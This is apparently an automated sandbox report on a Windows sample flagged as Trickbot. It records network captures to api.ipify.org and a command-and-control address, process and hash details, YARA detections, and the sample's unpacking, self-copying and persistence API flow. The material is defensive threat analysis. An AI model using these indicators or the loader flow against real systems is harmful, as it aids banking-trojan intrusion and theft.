        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Jan 16, 2025 09:10:53.632669926 CET192.168.2.81.1.1.10x9978Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Jan 16, 2025 09:10:53.640288115 CET1.1.1.1192.168.2.80x9978No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
        Jan 16, 2025 09:10:53.640288115 CET1.1.1.1192.168.2.80x9978No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
        Jan 16, 2025 09:10:53.640288115 CET1.1.1.1192.168.2.80x9978No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
        • 194.87.99.210
        • api.ipify.org
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.849712104.26.12.205805496C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        Jan 16, 2025 09:10:53.650801897 CET187OUTGET / HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
        Host: api.ipify.org
        Jan 16, 2025 09:10:54.159845114 CET430INHTTP/1.1 200 OK
        Date: Thu, 16 Jan 2025 08:10:54 GMT
        Content-Type: text/plain
        Content-Length: 12
        Connection: keep-alive
        Vary: Origin
        CF-Cache-Status: DYNAMIC
        Server: cloudflare
        CF-RAY: 902ca1b808646fc5-IAD
        server-timing: cfL4;desc="?proto=TCP&rtt=7051&min_rtt=7051&rtt_var=3525&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=187&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
        Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
        Data Ascii: 8.46.123.189


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.849713194.87.99.2104435496C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2025-01-16 08:10:55 UTC248OUTGET /mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/ HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
        Host: 194.87.99.210
        2025-01-16 08:10:55 UTC159INHTTP/1.1 404 Not Found
        Server: nginx/1.24.0 (Ubuntu)
        Date: Thu, 16 Jan 2025 08:10:55 GMT
        Content-Type: text/html
        Content-Length: 564
        Connection: close
        2025-01-16 08:10:55 UTC564INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.849714194.87.99.2104435496C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2025-01-16 08:10:56 UTC248OUTGET /mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/ HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
        Host: 194.87.99.210
        2025-01-16 08:10:56 UTC159INHTTP/1.1 404 Not Found
        Server: nginx/1.24.0 (Ubuntu)
        Date: Thu, 16 Jan 2025 08:10:56 GMT
        Content-Type: text/html
        Content-Length: 564
        Connection: close
        2025-01-16 08:10:56 UTC564INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable


        Click to jump to process

        Click to jump to process

        Click to jump to process

        Target ID:0
        Start time:03:09:09
        Start date:16/01/2025
        Path:C:\Users\user\Desktop\55ryoipjfdr.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\Desktop\55ryoipjfdr.exe"
        Imagebase:0x400000
        File size:396'288 bytes
        MD5 hash:F0B9F50C6A247AC5CA9CC95135B83DCF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true

        Target ID:3
        Start time:03:09:46
        Start date:16/01/2025
        Path:C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe
        Wow64 process (32bit):true
        Commandline:C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe
        Imagebase:0x400000
        File size:396'288 bytes
        MD5 hash:F0B9F50C6A247AC5CA9CC95135B83DCF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: Windows_Trojan_Trickbot_01365e46, Description: unknown, Source: 00000003.00000002.2121898954.000000000057E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        Antivirus matches:
        • Detection: 100%, Avira
        • Detection: 100%, Joe Sandbox ML
        • Detection: 95%, ReversingLabs
        Reputation:low
        Has exited:true

        Target ID:6
        Start time:03:10:18
        Start date:16/01/2025
        Path:C:\Windows\System32\svchost.exe
        Wow64 process (32bit):false
        Commandline:svchost.exe -k netsvcs
        Imagebase:0x7ff67e6d0000
        File size:55'320 bytes
        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: Windows_Trojan_Trickbot_01365e46, Description: unknown, Source: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000006.00000002.2121935863.000001DD0F013000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        Reputation:high
        Has exited:true

        Target ID:7
        Start time:03:10:21
        Start date:16/01/2025
        Path:C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe
        Wow64 process (32bit):true
        Commandline:C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe
        Imagebase:0x400000
        File size:396'288 bytes
        MD5 hash:F0B9F50C6A247AC5CA9CC95135B83DCF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: Windows_Trojan_Trickbot_01365e46, Description: unknown, Source: 00000007.00000002.2462776816.0000000000768000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        Reputation:low
        Has exited:true

        Target ID:8
        Start time:03:10:52
        Start date:16/01/2025
        Path:C:\Windows\System32\svchost.exe
        Wow64 process (32bit):false
        Commandline:svchost.exe -k netsvcs
        Imagebase:0x7ff67e6d0000
        File size:55'320 bytes
        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: Windows_Trojan_Trickbot_01365e46, Description: unknown, Source: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Author: unknown
        • Rule: Trickbot, Description: detect TrickBot in memory, Source: 00000008.00000002.2671214706.00000159F3602000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
        • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: JoeSecurity_Trickbot_1, Description: Yara detected Trickbot, Source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Trickbot, Description: detect TrickBot in memory, Source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
        Reputation:high
        Has exited:false

        Reset < >

          Execution Graph

          Execution Coverage:23.7%
          Dynamic/Decrypted Code Coverage:100%
          Signature Coverage:29.2%
          Total number of Nodes:120
          Total number of Limit Nodes:3
          execution_graph 965 401a00 984 402217 VirtualAlloc 965->984 967 401a2c 968 401a5d GetCurrentProcess 967->968 969 401d6d 967->969 985 402217 VirtualAlloc 967->985 986 402230 VirtualAlloc 968->986 972 401a4d 972->968 972->969 973 401a71 973->969 987 402262 VirtualProtect 973->987 976 401a95 976->969 983 401b1d 976->983 988 402230 VirtualAlloc 976->988 977 4021cf 4 API calls 980 401d37 977->980 978 401c33 LoadLibraryA 978->969 978->983 979 401ca4 979->969 979->980 989 402262 VirtualProtect 979->989 980->969 980->977 982 401c74 GetProcAddress 982->969 982->983 983->978 983->979 983->982 984->967 985->972 986->973 987->976 988->976 989->979 990 401da0 991 4012c4 4 API calls 990->991 992 401dc2 991->992 993 40197e 8 API calls 992->993 997 401dd6 993->997 994 40219c 995 4021af 994->995 1041 402200 GetProcessHeap RtlFreeHeap 994->1041 997->994 998 401e10 997->998 1023 402217 VirtualAlloc 997->1023 998->994 1001 401e2f 998->1001 1024 402217 VirtualAlloc 998->1024 1001->994 1025 402230 VirtualAlloc 1001->1025 1003 402184 1003->994 1040 40227b VirtualFree 1003->1040 1005 401e4a 1005->1003 1026 402262 VirtualProtect 1005->1026 1007 402176 1039 40227b VirtualFree 1007->1039 1009 40205c 1029 402249 VirtualAlloc 1009->1029 1013 4020a1 1015 40213b 1013->1015 1030 40184a 1013->1030 1014 401e71 1014->1007 1014->1015 1017 401ef8 1014->1017 1027 402230 VirtualAlloc 1014->1027 1015->1007 1038 40227b VirtualFree 1015->1038 1017->1009 1017->1015 1028 402262 VirtualProtect 1017->1028 1020 40212f 1037 40227b VirtualFree 1020->1037 1022 402116 CloseHandle CloseHandle 1022->1020 1023->998 1024->1001 1025->1005 1026->1014 1027->1014 1028->1017 1029->1013 1031 4021cf 4 API calls 1030->1031 1035 401865 1031->1035 1032 4018bc 1033 4018ea 1032->1033 1042 402200 GetProcessHeap RtlFreeHeap 1032->1042 1033->1020 1033->1022 1035->1032 1036 40189e CreateProcessW 1035->1036 1036->1032 1037->1015 1038->1015 1039->1003 1040->994 1041->995 1042->1033 887 4d007e 888 4d0083 887->888 900 4d05bd VirtualAlloc 888->900 890 4d0093 891 4d00a4 VirtualProtect VirtualProtect 890->891 895 4d00dc 891->895 892 4d012c 901 4d01c0 892->901 894 4d00f3 VirtualProtect 894->895 896 4d0122 VirtualProtect 894->896 895->892 895->894 895->896 896->895 897 4d0136 898 4d0187 VirtualFree 897->898 899 4d018f 898->899 900->890 902 4d0243 901->902 903 4d01d0 901->903 902->897 903->902 904 4d01f5 VirtualProtect 903->904 905 4d0232 VirtualProtect 903->905 904->903 905->903 906 401628 GetCommandLineW CommandLineToArgvW Sleep 922 401302 906->922 912 401717 ExitProcess 916 401716 916->912 917 4016ac 949 40197e FindResourceW 917->949 919 4016c0 920 4016c4 GetStartupInfoW 919->920 921 4016e4 919->921 920->921 921->912 955 402200 GetProcessHeap RtlFreeHeap 921->955 923 401312 922->923 929 401325 922->929 956 40116e GetPEB 923->956 925 401377 930 4018f4 925->930 926 401349 928 40134f LoadLibraryA 926->928 927 40116e GetPEB 927->929 928->929 929->925 929->926 929->927 931 401903 GetNativeSystemInfo 930->931 932 40168d 930->932 931->932 933 4013b7 GetModuleFileNameW lstrcpyW 932->933 936 40140d SHGetFolderPathW 933->936 935 401620 935->921 945 4012c4 935->945 936->935 938 4014a0 936->938 937 4012c4 4 API calls 939 401549 lstrcmpiW 937->939 938->935 938->937 939->935 941 40157c CreateDirectoryW 939->941 942 4015a5 941->942 942->935 943 4015d6 Sleep CreateProcessW 942->943 943->935 944 401607 CloseHandle CloseHandle 943->944 944->935 946 4012dd 945->946 958 4021cf 946->958 948 4012e9 948->917 950 4019a1 LoadResource 949->950 951 4019d0 949->951 950->951 952 4019af LockResource 950->952 951->919 952->951 953 4019bd SizeofResource 952->953 954 4021cf 4 API calls 953->954 954->951 955->916 957 40117a 956->957 957->929 957->957 959 4021db GetProcessHeap RtlReAllocateHeap 958->959 960 4021ef GetProcessHeap RtlAllocateHeap 958->960 959->948 960->948 961 4c0000 963 4c000a 961->963 962 4c0030 963->962 964 4c0054 VirtualAlloc 963->964

          Callgraph

          • Executed
          • Not Executed
          • Opacity -> Relevance
          • Disassembly available
          callgraph 0 Function_004D0449 56 Function_004D04A0 0->56 1 Function_004012C4 9 Function_004021CF 1->9 42 Function_0040118E 1->42 54 Function_004011A9 1->54 2 Function_004C0449 55 Function_004C04A0 2->55 3 Function_004D0245 4 Function_00402249 5 Function_004C0245 6 Function_0040184A 6->9 34 Function_00402200 6->34 43 Function_0040128F 6->43 51 Function_00401724 6->51 7 Function_004C01C0 8 Function_004D01C0 10 Function_004011D5 11 Function_0040175D 12 Function_004D02EF 32 Function_004D02F2 12->32 13 Function_00402262 14 Function_004C02EF 31 Function_004C02F2 14->31 15 Function_004D03E9 27 Function_004D04F5 15->27 39 Function_004D0605 15->39 64 Function_004D0431 15->64 16 Function_004C03E9 28 Function_004C04F5 16->28 65 Function_004C0431 16->65 17 Function_0040116E 18 Function_004011F0 18->10 19 Function_004C007E 19->5 19->7 24 Function_004C0579 19->24 26 Function_004C037B 19->26 19->28 45 Function_004C0519 19->45 52 Function_004C05A9 19->52 59 Function_004C05BD 19->59 63 Function_004C03BB 19->63 19->65 20 Function_004D007E 20->3 20->8 21 Function_004D0579 20->21 25 Function_004D037B 20->25 20->27 20->39 44 Function_004D0519 20->44 50 Function_004D05A9 20->50 57 Function_004D05BD 20->57 60 Function_004D03BB 20->60 20->64 22 Function_004018F4 23 Function_00401275 23->42 29 Function_0040227B 30 Function_0040197E 30->9 30->11 33 Function_0040137F 35 Function_00401000 35->11 35->51 36 Function_00401A00 36->9 36->11 36->13 46 Function_00402217 36->46 48 Function_00401920 36->48 36->51 58 Function_00402230 36->58 37 Function_00401302 37->17 37->18 37->23 38 Function_00401782 40 Function_004C0000 40->14 41 Function_004D0000 41->12 41->39 42->35 43->42 43->54 44->50 45->52 47 Function_0040171E 49 Function_00401DA0 49->1 49->4 49->6 49->11 49->13 49->29 49->30 49->33 49->34 49->46 49->48 49->51 49->58 53 Function_00401628 53->1 53->22 53->30 53->33 53->34 53->37 53->38 61 Function_004013B7 53->61 62 Function_004021B7 53->62 60->15 61->1 61->11 61->51 63->16 64->0 65->2

          Control-flow Graph

          APIs
            • Part of subcall function 004D05BD: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,004D0093), ref: 004D05CA
          • VirtualProtect.KERNELBASE(?,?,00000004,?,?), ref: 004D00B3
          • VirtualProtect.KERNELBASE(?,?,00000002,?,?,?,00000004,?,?), ref: 004D00C3
          • VirtualProtect.KERNELBASE(?,?,00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004), ref: 004D010C
          • VirtualProtect.KERNELBASE(00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004,?,?), ref: 004D0122
          • VirtualFree.KERNELBASE(?,00004000,00000002,?,?,?,00000004,?,?), ref: 004D0187
          Memory Dump Source
          • Source File: 00000000.00000002.1797595291.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_4d0000_55ryoipjfdr.jbxd
          Similarity
          • API ID: Virtual$Protect$AllocFree
          • String ID:
          • API String ID: 3729553426-0
          • Opcode ID: 7cb60aa3ca57c834e55298138eb6fcc60219c6ce3e155163db882c0b84b65934
          • Instruction ID: 5a17bec7897edf6b976a1ed4efd21f36a2c5e996aa76f4c9021502c72edba047
          • Opcode Fuzzy Hash: 7cb60aa3ca57c834e55298138eb6fcc60219c6ce3e155163db882c0b84b65934
          • Instruction Fuzzy Hash: 8B41AF32200114EFDB10EF25D865F6AB7A9EF84728F25411FF9058B312C77AEC02CAA5

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 0 4013b7-40140b GetModuleFileNameW lstrcpyW 1 40141c-401426 0->1 2 40140d-401412 0->2 4 401416-40141a 1->4 5 401428-401438 1->5 2->2 3 401414 2->3 3->1 4->1 4->5 6 401478-40147e 5->6 7 401480-40149a SHGetFolderPathW 6->7 8 40143a-401440 6->8 9 401620-401627 7->9 10 4014a0-4014ad 7->10 11 401442-401445 8->11 12 40146e-401476 8->12 13 4014b6-4014e6 call 40175d 10->13 14 4014af-4014b4 10->14 15 401450-401453 11->15 16 401447-40144e 11->16 12->6 24 401501-40150c 13->24 25 4014e8-4014f2 13->25 14->13 14->14 18 401455-401458 15->18 19 40145a-40145d 15->19 16->12 18->19 21 40146d 18->21 22 401464-40146b 19->22 23 40145f-401462 19->23 21->12 22->12 22->21 23->21 23->22 28 401542-401549 call 4012c4 24->28 29 40150e-401514 24->29 26 4014f4-4014f7 25->26 27 4014fa-4014ff 25->27 26->27 27->24 27->25 36 401552-401558 28->36 31 401516-40151d 29->31 32 401528-401532 29->32 31->32 35 40151f-401526 31->35 32->29 33 401534-40153c 32->33 33->9 33->28 35->32 35->33 37 40155a-401576 lstrcmpiW 36->37 38 40154b-401550 36->38 37->9 39 40157c-4015a7 CreateDirectoryW 37->39 38->36 39->9 41 4015a9-4015d4 call 401724 39->41 41->9 45 4015d6-401605 Sleep CreateProcessW 41->45 45->9 46 401607-401619 CloseHandle * 2 45->46 46->9
          APIs
          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000005,00000000), ref: 004013E1
          • lstrcpyW.KERNEL32(?,?), ref: 004013F5
          • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00401492
          • lstrcmpiW.KERNEL32(?,?,00000008), ref: 0040156E
          • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00401584
          • PathCombineW.SHLWAPI(?,?,?), ref: 0040159F
          • CopyFileW.KERNELBASE(?,?,00000000), ref: 004015CC
          • Sleep.KERNELBASE(00001388), ref: 004015DB
          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004015FD
          • CloseHandle.KERNEL32(?), ref: 0040160A
          • CloseHandle.KERNEL32(00401697), ref: 00401613
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd
          Similarity
          • API ID: CloseCreateFileHandlePath$CombineCopyDirectoryFolderModuleNameProcessSleeplstrcmpilstrcpy
          • String ID: PsIu$7Wu
          • API String ID: 1270845409-3440933012
          • Opcode ID: 8b3fec52b528aaaf24680b348fbcd39eeb8659f5e3d30cd4c57e5e12d04ac8df
          • Instruction ID: 56933cf5b107e2af838ce516cb83aba178c4ca4fb5e82b27baa26dd98f04b199
          • Opcode Fuzzy Hash: 8b3fec52b528aaaf24680b348fbcd39eeb8659f5e3d30cd4c57e5e12d04ac8df
          • Instruction Fuzzy Hash: CF7174B2D001199ACB209F64CD84AEFB7B8EB45704F4041BBE645F71B0E7799E84CB59

          Control-flow Graph

          APIs
          • GetCommandLineW.KERNEL32 ref: 00401651
          • CommandLineToArgvW.SHELL32(00000000,004040E4), ref: 0040165D
          • Sleep.KERNELBASE(000003E8), ref: 0040166D
            • Part of subcall function 00401302: LoadLibraryA.KERNEL32(00000000,75570BD0,?,00000000,?,00000000,?,00401682,00404010,004030D0), ref: 00401350
            • Part of subcall function 004018F4: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,0040168D,00404010,004030D0), ref: 00401907
            • Part of subcall function 004013B7: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000005,00000000), ref: 004013E1
            • Part of subcall function 004013B7: lstrcpyW.KERNEL32(?,?), ref: 004013F5
            • Part of subcall function 004013B7: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00401492
          • GetStartupInfoW.KERNEL32(00404098,00000000,00000000,0000000A,?,?,00000005,00404010,004030D0), ref: 004016D3
          • ExitProcess.KERNEL32 ref: 00401718
          Memory Dump Source
          • Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd
          Similarity
          • API ID: CommandInfoLine$ArgvExitFileFolderLibraryLoadModuleNameNativePathProcessSleepStartupSystemlstrcpy
          • String ID:
          • API String ID: 3425523471-0
          • Opcode ID: 0da129b2474c5623389851489ce034e0666de5b404546f95ef8cdb8554ca5125
          • Instruction ID: 71d7715d4196c25e6a1be9e88275a335be4e21cd6732a9f9521442d8aa86e98b
          • Opcode Fuzzy Hash: 0da129b2474c5623389851489ce034e0666de5b404546f95ef8cdb8554ca5125
          • Instruction Fuzzy Hash: DF2128B6D00204EBEB11AFE1DD46E9EBB78AB84705F00817BB701B21E1EB784655CB58

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 114 4d01c0-4d01ce 115 4d01d0 114->115 116 4d0243-4d0244 114->116 117 4d01d2-4d01d7 115->117 117->116 118 4d01d9-4d01e1 117->118 120 4d01e7-4d01ee 118->120 121 4d01e3 118->121 122 4d01f0-4d01f3 120->122 121->120 122->122 123 4d01f5-4d0209 VirtualProtect 122->123 124 4d020e-4d0211 123->124 125 4d020b 123->125 126 4d0212-4d0215 124->126 125->124 127 4d0217-4d021c 126->127 128 4d0232-4d0241 VirtualProtect 126->128 129 4d021e 127->129 130 4d0222-4d0230 127->130 128->117 129->130 130->126
          APIs
          • VirtualProtect.KERNELBASE(?,?,00000004,?,00000000,?,00000000,?,?,?,00000004,?,?), ref: 004D0201
          • VirtualProtect.KERNELBASE(?,00000000,?,?,?,00000000,?,?,?,00000004,?,?), ref: 004D023A
          Memory Dump Source
          • Source File: 00000000.00000002.1797595291.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_4d0000_55ryoipjfdr.jbxd
          Similarity
          • API ID: ProtectVirtual
          • String ID:
          • API String ID: 544645111-0
          • Opcode ID: df0d4710188bbc4545ffb25a3de640365ec90d346391f8a801651d14009fcf39
          • Instruction ID: 404d1affb8c9295c5f7926d890ff3de656c3597974fdf17a84328c0f58fdb77f
          • Opcode Fuzzy Hash: df0d4710188bbc4545ffb25a3de640365ec90d346391f8a801651d14009fcf39
          • Instruction Fuzzy Hash: 9911BC72501210ABEB304E19CC18BBBB7ACEF81720F15465FFC1AE7300D62AED0586A5

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 132 4018f4-401901 133 401903-40190e GetNativeSystemInfo 132->133 134 40191c-40191f 132->134 135 401910-401915 133->135 136 401917-40191b 133->136 135->134 135->136
          APIs
          • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,0040168D,00404010,004030D0), ref: 00401907
          Memory Dump Source
          • Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd
          Similarity
          • API ID: InfoNativeSystem
          • String ID:
          • API String ID: 1721193555-0
          • Opcode ID: 3734478bb59dad9b5a0ea859872c3a362607ae3d49e81bd9becfad3007244d02
          • Instruction ID: a2e681556b4012ba0be244234db5ae52ce7a7114cf7b728377cf91826f9dab11
          • Opcode Fuzzy Hash: 3734478bb59dad9b5a0ea859872c3a362607ae3d49e81bd9becfad3007244d02
          • Instruction Fuzzy Hash: 9AD05E92A1020546CF24F7F99A1559B73F89788308B0405B9C902F21D0FBB9EEC4C2A8

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 137 4c0000-4c0018 call 4c05d2 call 4c0605 143 4c001d-4c0026 call 4c02ef 137->143 146 4c0028-4c002e 143->146 147 4c0030 146->147 148 4c0031-4c007d call 4c05d2 VirtualAlloc 146->148
          APIs
          • VirtualAlloc.KERNELBASE(00000000,00000688,00001000,00000040), ref: 004C0065
          Memory Dump Source
          • Source File: 00000000.00000002.1797576745.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_4c0000_55ryoipjfdr.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: a2fcc1d63792b2b86ce2226597d373f45588513d77cf013809a06473fc1d853c
          • Instruction ID: 188c127560ca22886f4a5d337458b12cb635c04096a0c8dcf2294c023c59bbdb
          • Opcode Fuzzy Hash: a2fcc1d63792b2b86ce2226597d373f45588513d77cf013809a06473fc1d853c
          • Instruction Fuzzy Hash: 5B01F779A40304AFDB505F71CC04F8F3AA9AFC8720F42445EF98AA7281CE7C98808A58

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 154 4d05bd-4d05cf VirtualAlloc
          APIs
          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,004D0093), ref: 004D05CA
          Memory Dump Source
          • Source File: 00000000.00000002.1797595291.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_4d0000_55ryoipjfdr.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: a9a4fa599d775aa83550951cd01ab53a510ae55495336f8eeb8bc52accc60b48
          • Instruction ID: 65ce390d9ce214b0b9a70d03eb22b0c205847d94ce1a40b3c250883ace489992
          • Opcode Fuzzy Hash: a9a4fa599d775aa83550951cd01ab53a510ae55495336f8eeb8bc52accc60b48
          • Instruction Fuzzy Hash: EAB012B22C038477EB304E614C0EF8A3661ABC8FA3F350000FB106B1C48AF0E8018624

          Control-flow Graph

